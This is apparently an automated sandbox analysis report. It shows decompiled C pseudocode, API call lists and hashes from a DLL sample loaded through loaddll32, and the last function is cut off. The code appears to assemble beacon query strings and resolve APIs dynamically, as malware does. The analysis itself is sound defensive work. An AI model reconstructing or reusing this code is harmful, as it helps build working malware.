                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.516883219.0000000001360000.00000040.00000001.sdmp, Offset: 01360000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1360000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 64181d5a1a0adb3b83a868520eb234369a1b34ebae05e35cc0e8b6d16c9ba115
                                                                                                                                                                                                                                    • Instruction ID: 7de7b67859fb6ddd3c67e754c78e0e23f1aa6d1421b3ddbf00fea5fa86828bde
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 64181d5a1a0adb3b83a868520eb234369a1b34ebae05e35cc0e8b6d16c9ba115
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 59D09235E0016A9BCF24EA54CA5979EF3B6EF8D314F1500C8D50C3730087342E86CE40
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 66%
                                                                                                                                                                                                                                    			E02F9A279(long __eax, void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, void* _a16, void* _a24, intOrPtr _a32) {
                                                                                                                                                                                                                                    				intOrPtr _v0;
                                                                                                                                                                                                                                    				intOrPtr _v4;
                                                                                                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                                                                                                    				intOrPtr _v24;
                                                                                                                                                                                                                                    				intOrPtr _v28;
                                                                                                                                                                                                                                    				void* _v44;
                                                                                                                                                                                                                                    				intOrPtr _v52;
                                                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                                                    				long _t25;
                                                                                                                                                                                                                                    				intOrPtr _t26;
                                                                                                                                                                                                                                    				intOrPtr _t27;
                                                                                                                                                                                                                                    				intOrPtr _t28;
                                                                                                                                                                                                                                    				intOrPtr _t29;
                                                                                                                                                                                                                                    				intOrPtr _t30;
                                                                                                                                                                                                                                    				void* _t33;
                                                                                                                                                                                                                                    				intOrPtr _t34;
                                                                                                                                                                                                                                    				int _t37;
                                                                                                                                                                                                                                    				intOrPtr _t42;
                                                                                                                                                                                                                                    				intOrPtr _t43;
                                                                                                                                                                                                                                    				intOrPtr _t50;
                                                                                                                                                                                                                                    				intOrPtr _t54;
                                                                                                                                                                                                                                    				intOrPtr* _t56;
                                                                                                                                                                                                                                    				intOrPtr _t62;
                                                                                                                                                                                                                                    				intOrPtr _t68;
                                                                                                                                                                                                                                    				intOrPtr _t71;
                                                                                                                                                                                                                                    				intOrPtr _t74;
                                                                                                                                                                                                                                    				int _t77;
                                                                                                                                                                                                                                    				intOrPtr _t78;
                                                                                                                                                                                                                                    				int _t81;
                                                                                                                                                                                                                                    				intOrPtr _t83;
                                                                                                                                                                                                                                    				int _t86;
                                                                                                                                                                                                                                    				intOrPtr* _t89;
                                                                                                                                                                                                                                    				intOrPtr* _t90;
                                                                                                                                                                                                                                    				void* _t91;
                                                                                                                                                                                                                                    				void* _t95;
                                                                                                                                                                                                                                    				void* _t96;
                                                                                                                                                                                                                                    				void* _t97;
                                                                                                                                                                                                                                    				intOrPtr _t98;
                                                                                                                                                                                                                                    				void* _t100;
                                                                                                                                                                                                                                    				int _t101;
                                                                                                                                                                                                                                    				void* _t102;
                                                                                                                                                                                                                                    				void* _t103;
                                                                                                                                                                                                                                    				void* _t105;
                                                                                                                                                                                                                                    				void* _t106;
                                                                                                                                                                                                                                    				void* _t108;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t95 = __edx;
                                                                                                                                                                                                                                    				_t91 = __ecx;
                                                                                                                                                                                                                                    				_t25 = __eax;
                                                                                                                                                                                                                                    				_t105 = _a16;
                                                                                                                                                                                                                                    				_v4 = 8;
                                                                                                                                                                                                                                    				if(__eax == 0) {
                                                                                                                                                                                                                                    					_t25 = GetTickCount();
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t26 =  *0x2f9d018; // 0x99d5691b
                                                                                                                                                                                                                                    				asm("bswap eax");
                                                                                                                                                                                                                                    				_t27 =  *0x2f9d014; // 0x3a87c8cd
                                                                                                                                                                                                                                    				asm("bswap eax");
                                                                                                                                                                                                                                    				_t28 =  *0x2f9d010; // 0xd8d2f808
                                                                                                                                                                                                                                    				asm("bswap eax");
                                                                                                                                                                                                                                    				_t29 =  *0x2f9d00c; // 0x62819102
                                                                                                                                                                                                                                    				asm("bswap eax");
                                                                                                                                                                                                                                    				_t30 =  *0x2f9d27c; // 0x44a5a8
                                                                                                                                                                                                                                    				_t3 = _t30 + 0x2f9e633; // 0x74666f73
                                                                                                                                                                                                                                    				_t101 = wsprintfA(_t105, _t3, 2, 0x3d14b, _t29, _t28, _t27, _t26,  *0x2f9d02c,  *0x2f9d004, _t25);
                                                                                                                                                                                                                                    				_t33 = E02F91C1A();
                                                                                                                                                                                                                                    				_t34 =  *0x2f9d27c; // 0x44a5a8
                                                                                                                                                                                                                                    				_t4 = _t34 + 0x2f9e673; // 0x74707526
                                                                                                                                                                                                                                    				_t37 = wsprintfA(_t101 + _t105, _t4, _t33);
                                                                                                                                                                                                                                    				_t108 = _t106 + 0x38;
                                                                                                                                                                                                                                    				_t102 = _t101 + _t37;
                                                                                                                                                                                                                                    				_t96 = E02F954BC(_t91);
                                                                                                                                                                                                                                    				if(_t96 != 0) {
                                                                                                                                                                                                                                    					_t83 =  *0x2f9d27c; // 0x44a5a8
                                                                                                                                                                                                                                    					_t6 = _t83 + 0x2f9e8eb; // 0x736e6426
                                                                                                                                                                                                                                    					_t86 = wsprintfA(_t102 + _t105, _t6, _t96);
                                                                                                                                                                                                                                    					_t108 = _t108 + 0xc;
                                                                                                                                                                                                                                    					_t102 = _t102 + _t86;
                                                                                                                                                                                                                                    					HeapFree( *0x2f9d238, 0, _t96);
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t97 = E02F97649();
                                                                                                                                                                                                                                    				if(_t97 != 0) {
                                                                                                                                                                                                                                    					_t78 =  *0x2f9d27c; // 0x44a5a8
                                                                                                                                                                                                                                    					_t8 = _t78 + 0x2f9e8f3; // 0x6f687726
                                                                                                                                                                                                                                    					_t81 = wsprintfA(_t102 + _t105, _t8, _t97);
                                                                                                                                                                                                                                    					_t108 = _t108 + 0xc;
                                                                                                                                                                                                                                    					_t102 = _t102 + _t81;
                                                                                                                                                                                                                                    					HeapFree( *0x2f9d238, 0, _t97);
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t98 =  *0x2f9d32c; // 0x33e95b0
                                                                                                                                                                                                                                    				_a32 = E02F99395(0x2f9d00a, _t98 + 4);
                                                                                                                                                                                                                                    				_t42 =  *0x2f9d2cc; // 0x0
                                                                                                                                                                                                                                    				if(_t42 != 0) {
                                                                                                                                                                                                                                    					_t74 =  *0x2f9d27c; // 0x44a5a8
                                                                                                                                                                                                                                    					_t11 = _t74 + 0x2f9e8cd; // 0x3d736f26
                                                                                                                                                                                                                                    					_t77 = wsprintfA(_t102 + _t105, _t11, _t42);
                                                                                                                                                                                                                                    					_t108 = _t108 + 0xc;
                                                                                                                                                                                                                                    					_t102 = _t102 + _t77;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t43 =  *0x2f9d2c8; // 0x0
                                                                                                                                                                                                                                    				if(_t43 != 0) {
                                                                                                                                                                                                                                    					_t71 =  *0x2f9d27c; // 0x44a5a8
                                                                                                                                                                                                                                    					_t13 = _t71 + 0x2f9e8c6; // 0x3d706926
                                                                                                                                                                                                                                    					wsprintfA(_t102 + _t105, _t13, _t43);
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				if(_a32 != 0) {
                                                                                                                                                                                                                                    					_t100 = RtlAllocateHeap( *0x2f9d238, 0, 0x800);
                                                                                                                                                                                                                                    					if(_t100 != 0) {
                                                                                                                                                                                                                                    						E02F97A80(GetTickCount());
                                                                                                                                                                                                                                    						_t50 =  *0x2f9d32c; // 0x33e95b0
                                                                                                                                                                                                                                    						__imp__(_t50 + 0x40);
                                                                                                                                                                                                                                    						asm("lock xadd [eax], ecx");
                                                                                                                                                                                                                                    						_t54 =  *0x2f9d32c; // 0x33e95b0
                                                                                                                                                                                                                                    						__imp__(_t54 + 0x40);
                                                                                                                                                                                                                                    						_t56 =  *0x2f9d32c; // 0x33e95b0
                                                                                                                                                                                                                                    						_t103 = E02F98307(1, _t95, _t105,  *_t56);
                                                                                                                                                                                                                                    						asm("lock xadd [eax], ecx");
                                                                                                                                                                                                                                    						if(_t103 != 0) {
                                                                                                                                                                                                                                    							StrTrimA(_t103, 0x2f9c2ac);
                                                                                                                                                                                                                                    							_push(_t103);
                                                                                                                                                                                                                                    							_t62 = E02F93CC8();
                                                                                                                                                                                                                                    							_v16 = _t62;
                                                                                                                                                                                                                                    							if(_t62 != 0) {
                                                                                                                                                                                                                                    								_t89 = __imp__;
                                                                                                                                                                                                                                    								 *_t89(_t103, _v0);
                                                                                                                                                                                                                                    								 *_t89(_t100, _a4);
                                                                                                                                                                                                                                    								_t90 = __imp__;
                                                                                                                                                                                                                                    								 *_t90(_t100, _v28);
                                                                                                                                                                                                                                    								 *_t90(_t100, _t103);
                                                                                                                                                                                                                                    								_t68 = E02F91199(0xffffffffffffffff, _t100, _v28, _v24);
                                                                                                                                                                                                                                    								_v52 = _t68;
                                                                                                                                                                                                                                    								if(_t68 != 0 && _t68 != 0x10d2) {
                                                                                                                                                                                                                                    									E02F9A1B0();
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    								HeapFree( *0x2f9d238, 0, _v44);
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							HeapFree( *0x2f9d238, 0, _t103);
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						HeapFree( *0x2f9d238, 0, _t100);
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					HeapFree( *0x2f9d238, 0, _a24);
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				HeapFree( *0x2f9d238, 0, _t105);
                                                                                                                                                                                                                                    				return _a12;
                                                                                                                                                                                                                                    			}
















































                                                                                                                                                                                                                                    0x02f9a306
                                                                                                                                                                                                                                    0x02f9a30a
                                                                                                                                                                                                                                    0x02f9a30c
                                                                                                                                                                                                                                    0x02f9a311
                                                                                                                                                                                                                                    0x02f9a31d
                                                                                                                                                                                                                                    0x02f9a31f
                                                                                                                                                                                                                                    0x02f9a32b
                                                                                                                                                                                                                                    0x02f9a32d
                                                                                                                                                                                                                                    0x02f9a32d
                                                                                                                                                                                                                                    0x02f9a338
                                                                                                                                                                                                                                    0x02f9a33c
                                                                                                                                                                                                                                    0x02f9a33e
                                                                                                                                                                                                                                    0x02f9a343
                                                                                                                                                                                                                                    0x02f9a34f
                                                                                                                                                                                                                                    0x02f9a351
                                                                                                                                                                                                                                    0x02f9a35d
                                                                                                                                                                                                                                    0x02f9a35f
                                                                                                                                                                                                                                    0x02f9a35f
                                                                                                                                                                                                                                    0x02f9a365
                                                                                                                                                                                                                                    0x02f9a378
                                                                                                                                                                                                                                    0x02f9a37c
                                                                                                                                                                                                                                    0x02f9a383
                                                                                                                                                                                                                                    0x02f9a386
                                                                                                                                                                                                                                    0x02f9a38b
                                                                                                                                                                                                                                    0x02f9a396
                                                                                                                                                                                                                                    0x02f9a398
                                                                                                                                                                                                                                    0x02f9a39b
                                                                                                                                                                                                                                    0x02f9a39b
                                                                                                                                                                                                                                    0x02f9a39d
                                                                                                                                                                                                                                    0x02f9a3a4
                                                                                                                                                                                                                                    0x02f9a3a7
                                                                                                                                                                                                                                    0x02f9a3ac
                                                                                                                                                                                                                                    0x02f9a3b6
                                                                                                                                                                                                                                    0x02f9a3b8
                                                                                                                                                                                                                                    0x02f9a3c0
                                                                                                                                                                                                                                    0x02f9a3d9
                                                                                                                                                                                                                                    0x02f9a3dd
                                                                                                                                                                                                                                    0x02f9a3e9
                                                                                                                                                                                                                                    0x02f9a3ee
                                                                                                                                                                                                                                    0x02f9a3f7
                                                                                                                                                                                                                                    0x02f9a408
                                                                                                                                                                                                                                    0x02f9a40c
                                                                                                                                                                                                                                    0x02f9a415
                                                                                                                                                                                                                                    0x02f9a41b
                                                                                                                                                                                                                                    0x02f9a428
                                                                                                                                                                                                                                    0x02f9a435
                                                                                                                                                                                                                                    0x02f9a43b
                                                                                                                                                                                                                                    0x02f9a447
                                                                                                                                                                                                                                    0x02f9a44d
                                                                                                                                                                                                                                    0x02f9a44e
                                                                                                                                                                                                                                    0x02f9a455
                                                                                                                                                                                                                                    0x02f9a459
                                                                                                                                                                                                                                    0x02f9a45f
                                                                                                                                                                                                                                    0x02f9a466
                                                                                                                                                                                                                                    0x02f9a46d
                                                                                                                                                                                                                                    0x02f9a473
                                                                                                                                                                                                                                    0x02f9a47a
                                                                                                                                                                                                                                    0x02f9a47e
                                                                                                                                                                                                                                    0x02f9a489
                                                                                                                                                                                                                                    0x02f9a490
                                                                                                                                                                                                                                    0x02f9a494
                                                                                                                                                                                                                                    0x02f9a49d
                                                                                                                                                                                                                                    0x02f9a49d
                                                                                                                                                                                                                                    0x02f9a4ae
                                                                                                                                                                                                                                    0x02f9a4ae
                                                                                                                                                                                                                                    0x02f9a4bd
                                                                                                                                                                                                                                    0x02f9a4bd
                                                                                                                                                                                                                                    0x02f9a4cc
                                                                                                                                                                                                                                    0x02f9a4cc
                                                                                                                                                                                                                                    0x02f9a4de
                                                                                                                                                                                                                                    0x02f9a4de
                                                                                                                                                                                                                                    0x02f9a4ed
                                                                                                                                                                                                                                    0x02f9a4fe

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 02F9A290
                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 02F9A2DD
                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 02F9A2FA
                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 02F9A31D
                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,00000000), ref: 02F9A32D
                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 02F9A34F
                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,00000000), ref: 02F9A35F
                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 02F9A396
                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 02F9A3B6
                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 02F9A3D3
                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 02F9A3E3
                                                                                                                                                                                                                                    • RtlEnterCriticalSection.NTDLL(033E9570), ref: 02F9A3F7
                                                                                                                                                                                                                                    • RtlLeaveCriticalSection.NTDLL(033E9570), ref: 02F9A415
                                                                                                                                                                                                                                      • Part of subcall function 02F98307: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,73FCC740,?,?,02F9A428,?,033E95B0), ref: 02F98332
                                                                                                                                                                                                                                      • Part of subcall function 02F98307: lstrlen.KERNEL32(?,?,?,02F9A428,?,033E95B0), ref: 02F9833A
                                                                                                                                                                                                                                      • Part of subcall function 02F98307: strcpy.NTDLL ref: 02F98351
                                                                                                                                                                                                                                      • Part of subcall function 02F98307: lstrcat.KERNEL32(00000000,?), ref: 02F9835C
                                                                                                                                                                                                                                      • Part of subcall function 02F98307: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,02F9A428,?,033E95B0), ref: 02F98379
                                                                                                                                                                                                                                    • StrTrimA.SHLWAPI(00000000,02F9C2AC,?,033E95B0), ref: 02F9A447
                                                                                                                                                                                                                                      • Part of subcall function 02F93CC8: lstrlen.KERNEL32(033E87FA,00000000,00000000,73FCC740,02F9A453,00000000), ref: 02F93CD8
                                                                                                                                                                                                                                      • Part of subcall function 02F93CC8: lstrlen.KERNEL32(?), ref: 02F93CE0
                                                                                                                                                                                                                                      • Part of subcall function 02F93CC8: lstrcpy.KERNEL32(00000000,033E87FA), ref: 02F93CF4
                                                                                                                                                                                                                                      • Part of subcall function 02F93CC8: lstrcat.KERNEL32(00000000,?), ref: 02F93CFF
                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(00000000,?), ref: 02F9A466
                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 02F9A46D
                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,?), ref: 02F9A47A
                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 02F9A47E
                                                                                                                                                                                                                                      • Part of subcall function 02F91199: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,76D681D0), ref: 02F9124B
                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 02F9A4AE
                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 02F9A4BD
                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,00000000,?,033E95B0), ref: 02F9A4CC
                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,00000000), ref: 02F9A4DE
                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?), ref: 02F9A4ED
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Heap$Free$wsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeaveObjectSingleWaitstrcpy
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3080378247-0
                                                                                                                                                                                                                                    • Opcode ID: 4e80e4afa1f8bb2d2a0906a8f025aa73446cfbd74184494784acd345397147a3
                                                                                                                                                                                                                                    • Instruction ID: 5ce70c321341c45595022432c78a9714f4f9e01efb6a9ef8ce5717f836ecf580
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4e80e4afa1f8bb2d2a0906a8f025aa73446cfbd74184494784acd345397147a3
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A361C171D80208AFEB11EB64EC48F5AB7E8EB48BC0F250815FA08D7260D735E925DF65
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 27%
                                                                                                                                                                                                                                    			E02F9816C(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                                                                    				long _v16;
                                                                                                                                                                                                                                    				intOrPtr _v20;
                                                                                                                                                                                                                                    				signed int _v24;
                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                    				long _t43;
                                                                                                                                                                                                                                    				intOrPtr _t44;
                                                                                                                                                                                                                                    				intOrPtr _t46;
                                                                                                                                                                                                                                    				void* _t48;
                                                                                                                                                                                                                                    				void* _t49;
                                                                                                                                                                                                                                    				void* _t50;
                                                                                                                                                                                                                                    				intOrPtr _t54;
                                                                                                                                                                                                                                    				intOrPtr _t57;
                                                                                                                                                                                                                                    				void* _t58;
                                                                                                                                                                                                                                    				void* _t59;
                                                                                                                                                                                                                                    				void* _t60;
                                                                                                                                                                                                                                    				intOrPtr _t66;
                                                                                                                                                                                                                                    				void* _t71;
                                                                                                                                                                                                                                    				void* _t74;
                                                                                                                                                                                                                                    				intOrPtr _t75;
                                                                                                                                                                                                                                    				void* _t77;
                                                                                                                                                                                                                                    				intOrPtr _t79;
                                                                                                                                                                                                                                    				intOrPtr* _t80;
                                                                                                                                                                                                                                    				intOrPtr _t91;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t79 =  *0x2f9d33c; // 0x33e9bc8
                                                                                                                                                                                                                                    				_v24 = 8;
                                                                                                                                                                                                                                    				_t43 = GetTickCount();
                                                                                                                                                                                                                                    				_push(5);
                                                                                                                                                                                                                                    				_t74 = 0xa;
                                                                                                                                                                                                                                    				_v16 = _t43;
                                                                                                                                                                                                                                    				_t44 = E02F970F5(_t74,  &_v16);
                                                                                                                                                                                                                                    				_v8 = _t44;
                                                                                                                                                                                                                                    				if(_t44 == 0) {
                                                                                                                                                                                                                                    					_v8 = 0x2f9c1ac;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t46 = E02F98022(_t79);
                                                                                                                                                                                                                                    				_v12 = _t46;
                                                                                                                                                                                                                                    				if(_t46 != 0) {
                                                                                                                                                                                                                                    					_t80 = __imp__;
                                                                                                                                                                                                                                    					_t48 =  *_t80(_v8, _t71);
                                                                                                                                                                                                                                    					_t49 =  *_t80(_v12);
                                                                                                                                                                                                                                    					_t50 =  *_t80(_a4);
                                                                                                                                                                                                                                    					_t54 = E02F92049(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
                                                                                                                                                                                                                                    					_v20 = _t54;
                                                                                                                                                                                                                                    					if(_t54 != 0) {
                                                                                                                                                                                                                                    						_t75 =  *0x2f9d27c; // 0x44a5a8
                                                                                                                                                                                                                                    						_t16 = _t75 + 0x2f9eb28; // 0x530025
                                                                                                                                                                                                                                    						 *0x2f9d11c(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
                                                                                                                                                                                                                                    						_push(4);
                                                                                                                                                                                                                                    						_t77 = 5;
                                                                                                                                                                                                                                    						_t57 = E02F970F5(_t77,  &_v16);
                                                                                                                                                                                                                                    						_v8 = _t57;
                                                                                                                                                                                                                                    						if(_t57 == 0) {
                                                                                                                                                                                                                                    							_v8 = 0x2f9c1b0;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t58 =  *_t80(_v8);
                                                                                                                                                                                                                                    						_t59 =  *_t80(_v12);
                                                                                                                                                                                                                                    						_t60 =  *_t80(_a4);
                                                                                                                                                                                                                                    						_t91 = E02F92049(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
                                                                                                                                                                                                                                    						if(_t91 == 0) {
                                                                                                                                                                                                                                    							E02F99039(_v20);
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							_t66 =  *0x2f9d27c; // 0x44a5a8
                                                                                                                                                                                                                                    							_t31 = _t66 + 0x2f9ec48; // 0x73006d
                                                                                                                                                                                                                                    							 *0x2f9d11c(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
                                                                                                                                                                                                                                    							 *_a16 = _v20;
                                                                                                                                                                                                                                    							_v24 = _v24 & 0x00000000;
                                                                                                                                                                                                                                    							 *_a20 = _t91;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					E02F99039(_v12);
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return _v24;
                                                                                                                                                                                                                                    			}




























                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 02F98181
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?,80000002,00000005), ref: 02F981C1
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(00000000), ref: 02F981CA
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(00000000), ref: 02F981D1
                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(80000002), ref: 02F981DE
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?,00000004), ref: 02F9823E
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?), ref: 02F98247
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?), ref: 02F9824E
                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(?), ref: 02F98255
                                                                                                                                                                                                                                      • Part of subcall function 02F99039: HeapFree.KERNEL32(00000000,00000000,02F97F18,00000000,?,?,00000000), ref: 02F99045
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: lstrlen$CountFreeHeapTick
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2535036572-0
                                                                                                                                                                                                                                    • Opcode ID: 094690518737ca457b7a564afb7fc5c58635a8a3df9f51a4527d449b6a903003
                                                                                                                                                                                                                                    • Instruction ID: 8fd73de919553a1dc4ae3ea46bf996bb94fdd8f6c43f69df1714cf8ef5e97238
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 094690518737ca457b7a564afb7fc5c58635a8a3df9f51a4527d449b6a903003
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 35416B72D00218FFEF11AFA4CC05A9EBBB5EF48784F154055EE04A7220D7359A61EF90
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 73%
                                                                                                                                                                                                                                    			E02F9205E(void* __eax, void* __ecx) {
                                                                                                                                                                                                                                    				long _v8;
                                                                                                                                                                                                                                    				char _v12;
                                                                                                                                                                                                                                    				void* _v16;
                                                                                                                                                                                                                                    				void* _v28;
                                                                                                                                                                                                                                    				long _v32;
                                                                                                                                                                                                                                    				void _v104;
                                                                                                                                                                                                                                    				char _v108;
                                                                                                                                                                                                                                    				long _t36;
                                                                                                                                                                                                                                    				intOrPtr _t40;
                                                                                                                                                                                                                                    				intOrPtr _t47;
                                                                                                                                                                                                                                    				intOrPtr _t50;
                                                                                                                                                                                                                                    				void* _t58;
                                                                                                                                                                                                                                    				void* _t68;
                                                                                                                                                                                                                                    				intOrPtr* _t70;
                                                                                                                                                                                                                                    				intOrPtr* _t71;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t1 = __eax + 0x14; // 0x74183966
                                                                                                                                                                                                                                    				_t69 =  *_t1;
                                                                                                                                                                                                                                    				_t36 = E02F9692C(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
                                                                                                                                                                                                                                    				_v8 = _t36;
                                                                                                                                                                                                                                    				if(_t36 != 0) {
                                                                                                                                                                                                                                    					L12:
                                                                                                                                                                                                                                    					return _v8;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				E02F9A8D8( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
                                                                                                                                                                                                                                    				_t40 = _v12(_v12);
                                                                                                                                                                                                                                    				_v8 = _t40;
                                                                                                                                                                                                                                    				if(_t40 == 0 && ( *0x2f9d260 & 0x00000001) != 0) {
                                                                                                                                                                                                                                    					_v32 = 0;
                                                                                                                                                                                                                                    					asm("stosd");
                                                                                                                                                                                                                                    					asm("stosd");
                                                                                                                                                                                                                                    					asm("stosd");
                                                                                                                                                                                                                                    					_v108 = 0;
                                                                                                                                                                                                                                    					memset( &_v104, 0, 0x40);
                                                                                                                                                                                                                                    					_t47 =  *0x2f9d27c; // 0x44a5a8
                                                                                                                                                                                                                                    					_t18 = _t47 + 0x2f9e3e6; // 0x73797325
                                                                                                                                                                                                                                    					_t68 = E02F995B1(_t18);
                                                                                                                                                                                                                                    					if(_t68 == 0) {
                                                                                                                                                                                                                                    						_v8 = 8;
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						_t50 =  *0x2f9d27c; // 0x44a5a8
                                                                                                                                                                                                                                    						_t19 = _t50 + 0x2f9e747; // 0x33e8cef
                                                                                                                                                                                                                                    						_t20 = _t50 + 0x2f9e0af; // 0x4e52454b
                                                                                                                                                                                                                                    						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
                                                                                                                                                                                                                                    						if(_t71 == 0) {
                                                                                                                                                                                                                                    							_v8 = 0x7f;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							_v108 = 0x44;
                                                                                                                                                                                                                                    							E02F984D5();
